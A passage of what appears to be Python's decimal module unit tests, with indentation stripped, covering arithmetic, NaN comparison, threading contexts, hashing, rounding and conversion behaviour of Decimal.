self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
